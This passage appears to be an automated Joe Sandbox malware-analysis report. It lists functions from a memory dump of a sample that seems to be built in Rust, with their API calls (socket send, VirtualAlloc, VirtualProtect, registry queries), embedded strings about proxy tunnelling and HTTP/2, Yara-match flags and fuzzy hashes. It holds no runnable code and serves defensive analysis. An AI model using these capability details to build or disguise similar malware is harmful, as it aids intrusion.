
APIs

memcpy.MSVCRT ref: 00007FF71A7E4337

Strings

tcp connect error, xrefs: 00007FF71A7E4491

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy
String ID: tcp connect error
API String ID: 3510742995-3983906501
Opcode ID: b346396f517aae219976fea43866e032b4d00a5e0ff1591a30da09625f8d5527
Instruction ID: 6ace758f6aa73d70c9660661d528108717ad074246ea73d0179927e4769960ab
Opcode Fuzzy Hash: b346396f517aae219976fea43866e032b4d00a5e0ff1591a30da09625f8d5527
Instruction Fuzzy Hash: 29915422A0CEC580F671AF2591053F9A760FB99764F845172CE8D27696DF3DE28EC710

Function 00007FF71A845C70 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF71A845D11
SetThreadStackGuarantee.KERNEL32 ref: 00007FF71A845DAB

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: ErrorGuaranteeLastStackThread
String ID:
API String ID: 2304615615-0
Opcode ID: 2a504a5b04ff23725d9f355e9442800cb31edef5f6160df3ba04c1c4a7d64c9f
Instruction ID: 3fce354f5848346dbe72606920959f9fd8d1b7ccd5a7c1a3d872320bd5cfd73b
Opcode Fuzzy Hash: 2a504a5b04ff23725d9f355e9442800cb31edef5f6160df3ba04c1c4a7d64c9f
Instruction Fuzzy Hash: 9D41F662B09A4545FB05FF22E4493BDD750AF49BE4F888072DE4D0BB86CE3CD55A8360

Function 00007FF71A84ED58 Relevance: 3.1, APIs: 2, Instructions: 108networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 00007FF71A84EDFF
WSAGetLastError.WS2_32(?,?,?,0000000D00000003,-7FFFFFFFFFFFFF40,-8000000000000000,?,00000000,?,?,00007FF71A7DFC96,?,00000000,?,?,00007FF71A7DF121), ref: 00007FF71A84EE14

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: ErrorLastsend
String ID:
API String ID: 1802528911-0
Opcode ID: 72cd2e1fdbdcc033eee39d19f21ed1817fcae169fff91bb8c9ad2bd43ceefb86
Instruction ID: 206867f3f4b451ca69b88bb89efc62620cb29ce3773cb1ad2bc5dc1a0edd5d41
Opcode Fuzzy Hash: 72cd2e1fdbdcc033eee39d19f21ed1817fcae169fff91bb8c9ad2bd43ceefb86
Instruction Fuzzy Hash: 1F31497260CA8188FB22BA1698006FAE721EF957B4F840173EE5D077D5CE3CD45A8310

Function 00007FF71A845E10 Relevance: 3.1, APIs: 2, Instructions: 62threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00007FF71A845EA8
SetThreadDescription.KERNELBASE ref: 00007FF71A845EBA

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: Thread$CurrentDescription
String ID:
API String ID: 654298328-0
Opcode ID: 958b72673ed78492c1e24539d98b98fd5fecfed94edf36c7bd84f68b68f19a89
Instruction ID: f4ae0ea19ec9393fab4550bf4faac6c0480616c40f9e9f4d1ec9829750d65156
Opcode Fuzzy Hash: 958b72673ed78492c1e24539d98b98fd5fecfed94edf36c7bd84f68b68f19a89
Instruction Fuzzy Hash: CC11AE76B19E5588FB06FB62D5183BC9761AB44FE4F844473CE0E17B84DE38D99A8320

Function 00007FF71A81877D Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF71A8187DE

Strings

main, xrefs: 00007FF71A8187A5

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy
String ID: main
API String ID: 3510742995-3207122276
Opcode ID: 0f17e29a02de98d152f66a33a9046dcbe47faad29edbef151854e86070552423
Instruction ID: 7424a702191e6ef801f52abd7e0bb80535d1fba76890d52ee2b9ef0506ee4d8b
Opcode Fuzzy Hash: 0f17e29a02de98d152f66a33a9046dcbe47faad29edbef151854e86070552423
Instruction Fuzzy Hash: D4119432A14E1282FB22FB21F5513BDA360EB947A4F944472DA4E03B92DF3CE469C350

Function 00007FF71A821580 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 00007FF71A821639
RtlWakeAddressAll.NTDLL ref: 00007FF71A821648

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: AddressWakeclosesocket
String ID:
API String ID: 947748948-0
Opcode ID: d8bc03e7968afdc8b3038f96d98704458aa201a36f99fa33856e09b0841493ef
Instruction ID: 5384ac3ca9dde550d7bd64c7bec67c9766c6896bddbd87222ddd93e923bd9865
Opcode Fuzzy Hash: d8bc03e7968afdc8b3038f96d98704458aa201a36f99fa33856e09b0841493ef
Instruction Fuzzy Hash: 19F0E933F146224FFB17DBB8A8506AD23A0A78179DB448036CF4A5B644DF389496C750

Function 00007FF71A8215F0 Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 00007FF71A821639
RtlWakeAddressAll.NTDLL ref: 00007FF71A821648

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: AddressWakeclosesocket
String ID:
API String ID: 947748948-0
Opcode ID: a998d827556b4a9a6d1af1ee82fc63cac52b512a03d77c94a7eaa85daf934d21
Instruction ID: 0a7fbbda8442719cdaa952e587b98c8812059293fbf541566e833c3511eb4f55
Opcode Fuzzy Hash: a998d827556b4a9a6d1af1ee82fc63cac52b512a03d77c94a7eaa85daf934d21
Instruction Fuzzy Hash: 3AF08137F24B2189FB02DB74A4503AC6370BB5576CF948132DF4A26A44DF3891D9C310

Function 00007FF71A7AB0FE Relevance: 2.6, APIs: 2, Instructions: 136COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF71A7AB16F
memcpy.MSVCRT ref: 00007FF71A7AB1F0

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 4937bb00717c3e19372ba053f2aa0f58b3313000c9793f6f9284184e91c93caa
Instruction ID: bbc15690abb2d76730d6912cd732d71d7b0cf339c3ec96cce2e4d3a4bb89ccc4
Opcode Fuzzy Hash: 4937bb00717c3e19372ba053f2aa0f58b3313000c9793f6f9284184e91c93caa
Instruction Fuzzy Hash: AB519172705F4692EE10AF56E5802ADA360FB58BE0F888832CF9D07791DF3CE5698354

Function 00007FF71A7E2866 Relevance: 2.5, APIs: 2, Instructions: 44COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF71A7E28A8
memcpy.MSVCRT ref: 00007FF71A7E28CB

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 091ea29b4aef54b842050c19db39b449db1e52e0910c9c49d5d66ea219a1b02e
Instruction ID: 129bce68beb2cbff3192d5960905173210d17220655de7720ba63adf4b6d62cd
Opcode Fuzzy Hash: 091ea29b4aef54b842050c19db39b449db1e52e0910c9c49d5d66ea219a1b02e
Instruction Fuzzy Hash: 7D016172B08A4281FE216E02F5413F9D350AB597E0F888172DE9A06786DE7CD28D8351

Function 000001912B78C8C4 Relevance: 1.6, APIs: 1, Instructions: 122memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 000001912B78C9AA

Memory Dump Source

Source File: 00000000.00000002.2905472003.000001912B770000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001912B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1912b770000_31#U544a.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 6884cc122900d09c2e80c4497b788fc7019c215181750ac59c273517aaf1b040
Instruction ID: 687bb1f6b8c1913ba295fff19ba4f8f5160c1b4634230356deec4b8e552b8a29
Opcode Fuzzy Hash: 6884cc122900d09c2e80c4497b788fc7019c215181750ac59c273517aaf1b040
Instruction Fuzzy Hash: 6F31727061DB1A8FEB94EF1CA85166933E1F79D310F6101AEE449C32A1CB74DC819BC2

Function 00007FF71A7D4939 Relevance: 1.6, APIs: 1, Instructions: 87COMMON

Download Yara Rule

APIs

RtlWakeAddressSingle.NTDLL ref: 00007FF71A7D49B1

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: AddressSingleWake
String ID:
API String ID: 3114109732-0
Opcode ID: ae26ab14712aa5630e19a575096875eb225210e5d4dc04ca41d98d982909760f
Instruction ID: af1191beb93a431a76b85b3b8c0a51efbca397b38372a2ed05cebdacdaa318ec
Opcode Fuzzy Hash: ae26ab14712aa5630e19a575096875eb225210e5d4dc04ca41d98d982909760f
Instruction Fuzzy Hash: 7E31C32361DE4181FA51EF05E4413BAE7A0AF88760F844172EA8E4B396DF3CD689C720

Function 00007FF71A8183E5 Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32 ref: 00007FF71A81845A

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: e31f994130b95db72ccabd40e81872a84d70798264efd81d2829ceaa4d9210c0
Instruction ID: fc5856667bb8860ebe247e9d8c37a4d64e76f382cb18609b5c74f5c204bc24c0
Opcode Fuzzy Hash: e31f994130b95db72ccabd40e81872a84d70798264efd81d2829ceaa4d9210c0
Instruction Fuzzy Hash: 5121C322718A8186FB22AB12A50126AE760FB897E0F908072EECD47B55CF3CD199C710

Function 000001912B2B00A9 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

SleepEx.KERNELBASE ref: 000001912B2B00CB

Memory Dump Source

Source File: 00000000.00000002.2905152309.000001912B2B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001912B2B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1912b2b0000_31#U544a.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 5fb423b695f3cfee935d38655f8edca52d8f20018304c7478e5673635ce2a742
Instruction ID: 6efdde1a4ee2df7dd3b31b5ae8ce6e1cd5b7c830f4e8cf4836e247628a0826b6
Opcode Fuzzy Hash: 5fb423b695f3cfee935d38655f8edca52d8f20018304c7478e5673635ce2a742
Instruction Fuzzy Hash: F9E086602A8B092EB94C336528BB7FA31C4F30E211F60041AE886411D3FC453C8241C6

Function 00007FF71A84EABB Relevance: 1.5, APIs: 1, Instructions: 22networkCOMMON

Download Yara Rule

APIs

WSAGetLastError.WS2_32 ref: 00007FF71A84EAF6

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 5636dea1f9fccbc14995db8cbeaccc1f28c5d67ebd0219fb2a5366a0ec67acb3
Instruction ID: 26dde385f3ab3421c5637c55ad273303dd37c0c9df4e3f19a8186d89115bcd78
Opcode Fuzzy Hash: 5636dea1f9fccbc14995db8cbeaccc1f28c5d67ebd0219fb2a5366a0ec67acb3
Instruction Fuzzy Hash: 81E092A1A18A058AFB216A7480453BAA3905B98360F940972DA5C863C1DE3DD16D8720

Function 000001912B78C6D4 Relevance: 1.4, APIs: 1, Instructions: 121memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 000001912B78C7BC

Memory Dump Source

Source File: 00000000.00000002.2905472003.000001912B770000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001912B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1912b770000_31#U544a.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 13dce0c2ed7977bca88aee7810df4e821072f98d65f8970bb6098039871f721c
Instruction ID: 4a218534a520b88af4b3ed943f812cf2db41e43e2c385ca2f1d010e8e5ff3f48
Opcode Fuzzy Hash: 13dce0c2ed7977bca88aee7810df4e821072f98d65f8970bb6098039871f721c
Instruction Fuzzy Hash: 3931C93065DB058FEB98EF2DA4A476637E1F799310F20452DE14AC33A5D734EC819782

Function 000001912B78C7F8 Relevance: 1.3, APIs: 1, Instructions: 75COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualFree.KERNELBASE ref: 000001912B78C8AE

Memory Dump Source

Source File: 00000000.00000002.2905472003.000001912B770000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001912B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1912b770000_31#U544a.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 44a50af090bd9a9f15baf6ddec63f32dc1979d6dc23cf38e8253f078d9970b2b
Instruction ID: 8cbefb0f2d65dcc196a5cbb058f9e34c7888f055030f1bc0dc8c9b63af31f16e
Opcode Fuzzy Hash: 44a50af090bd9a9f15baf6ddec63f32dc1979d6dc23cf38e8253f078d9970b2b
Instruction Fuzzy Hash: 35219330689A05AFFB94EB2CE45876937E2F799301F24052EE049D72E4C7389984DB42

Function 00007FF71A7D310F Relevance: 1.3, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF71A7D311B

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: f01af0c2a630b19e5c9dfd10714fd4266b936cb90e1d8849a772eebe551dbc21
Instruction ID: f07a3673f59353d76d210587e251f6451e60a5b6d37ff6e909804835ad18605f
Opcode Fuzzy Hash: f01af0c2a630b19e5c9dfd10714fd4266b936cb90e1d8849a772eebe551dbc21
Instruction Fuzzy Hash: C1D0C202F05C5282F676762AA4851B9D220DB88730F9083B3CBBD063D08E2EE9DF5310

Non-executed Functions

Function 00007FF71A7DB251 Relevance: 89.7, APIs: 54, Strings: 5, Instructions: 1180COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF71A7DB5CA
memcpy.MSVCRT ref: 00007FF71A7DB608
memcpy.MSVCRT ref: 00007FF71A7DB6A6
memcpy.MSVCRT ref: 00007FF71A7DB6BF
memcpy.MSVCRT ref: 00007FF71A7DB6D0
memcpy.MSVCRT ref: 00007FF71A7DB708
memcpy.MSVCRT ref: 00007FF71A7DBCCB

Part of subcall function 00007FF71A7AA76B: memcpy.MSVCRT ref: 00007FF71A7AA799

memcpy.MSVCRT ref: 00007FF71A7DBA23
memcpy.MSVCRT ref: 00007FF71A7DC931
memcpy.MSVCRT ref: 00007FF71A7DC94A
memcpy.MSVCRT ref: 00007FF71A7DC975
memcpy.MSVCRT ref: 00007FF71A7DC993

Part of subcall function 00007FF71A7D74CC: memcpy.MSVCRT ref: 00007FF71A7D7502

memcpy.MSVCRT ref: 00007FF71A7DCB76

Strings

unexpected eof while tunneling, xrefs: 00007FF71A7DCB25
HTTP/1.1 200HTTP/1.0 200HTTP/1.1 407unsuccessful tunnelproxy authentication requiredproxy headers too long for tunnel, xrefs: 00007FF71A7DCA84
future polled after completion/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/tokio-native-tls-0.3.1/src/lib.rs, xrefs: 00007FF71A7DC9B4, 00007FF71A7DC9C4
no host in urlscheme and authority is valid Uri, xrefs: 00007FF71A7DBBC2, 00007FF71A7DC295
User-Agent: Proxy-Authorization: , xrefs: 00007FF71A7DB8DD

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy
String ID: HTTP/1.1 200HTTP/1.0 200HTTP/1.1 407unsuccessful tunnelproxy authentication requiredproxy headers too long for tunnel$User-Agent: Proxy-Authorization: $future polled after completion/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/tokio-native-tls-0.3.1/src/lib.rs$no host in urlscheme and authority is valid Uri$unexpected eof while tunneling
API String ID: 3510742995-2507051208
Opcode ID: 9e233cc7c7a6e4a2350cbcb09bfe674d677c64c52aa91cf88c253697d9be228e
Instruction ID: 04e73e6da6312309db9bd59b700c44ab84c379ed4436c04453d05c8f2ec54b36
Opcode Fuzzy Hash: 9e233cc7c7a6e4a2350cbcb09bfe674d677c64c52aa91cf88c253697d9be228e
Instruction Fuzzy Hash: 39D25E22608FC180F761AF25E4543EAA761FB89B98F844076DE8C1775ADF38D29DC720

Function 00007FF71A7F1C4A Relevance: 44.1, APIs: 20, Strings: 7, Instructions: 3569COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF71A7F1CB1
memcpy.MSVCRT ref: 00007FF71A7F219C
memcpy.MSVCRT ref: 00007FF71A7F21B4
memcpy.MSVCRT ref: 00007FF71A7F2206
memcpy.MSVCRT ref: 00007FF71A7F2586
memcpy.MSVCRT ref: 00007FF71A7F6824

Strings

invalid initial remote window size, xrefs: 00007FF71A7F308E
PRI * HTTP/2.0SM, xrefs: 00007FF71A7F222D
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF71A7F76B3, 00007FF71A7F77C0
assertion failed: DEFAULT_MAX_FRAME_SIZE <= val && val <= MAX_MAX_FRAME_SIZE/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/h2-0.3.24/src/frame/settings.rs, xrefs: 00007FF71A7F7649
invalid SETTINGS frame, xrefs: 00007FF71A7F291B
assertion failed: max <= std::u32::MAX as usize, xrefs: 00007FF71A7F7661
invalid initial window size, xrefs: 00007FF71A7F309F

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy
String ID: PRI * HTTP/2.0SM$assertion failed: DEFAULT_MAX_FRAME_SIZE <= val && val <= MAX_MAX_FRAME_SIZE/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/h2-0.3.24/src/frame/settings.rs$assertion failed: max <= std::u32::MAX as usize$called `Result::unwrap()` on an `Err` value$invalid SETTINGS frame$invalid initial remote window size$invalid initial window size
API String ID: 3510742995-1858801466
Opcode ID: 6fe44f72a5d5090fa8b0dd262600670ce53404be43f71db7f105898d2d57a901
Instruction ID: b72c7d9cf5cd4f3cdae568485105ff96c03645ae1fb16e61bec905a98365cecf
Opcode Fuzzy Hash: 6fe44f72a5d5090fa8b0dd262600670ce53404be43f71db7f105898d2d57a901
Instruction Fuzzy Hash: 39B3C136609FC486D7A5CB15E4847DAB3A8F788B94F41412ADBDC83B58EF38D5A5CB00

Function 00007FF71A8274C0 Relevance: 42.9, APIs: 21, Strings: 2, Instructions: 2687COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF71A828F75

Strings

.debug_abbrev.debug_addr.debug_aranges.debug_cu_index.debug_info.debug_line.debug_line_str.debug_loc.debug_loclists.debug_ranges.debug_rnglists.debug_str.debug_str_offsets.debug_tu_index.debug_typesNulErrorUtf8Errorvalid_up_toerror_len, xrefs: 00007FF71A828480
.debug_abbrev.dwo.debug_info.dwo.debug_line.dwo.debug_loc.dwo.debug_loclists.dwo.debug_rnglists.dwo.debug_str.dwo.debug_str_offsets.dwo.debug_types.dwostd\src\..\..\backtrace\src\symbolize\gimli.rs, xrefs: 00007FF71A82ACA0

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy
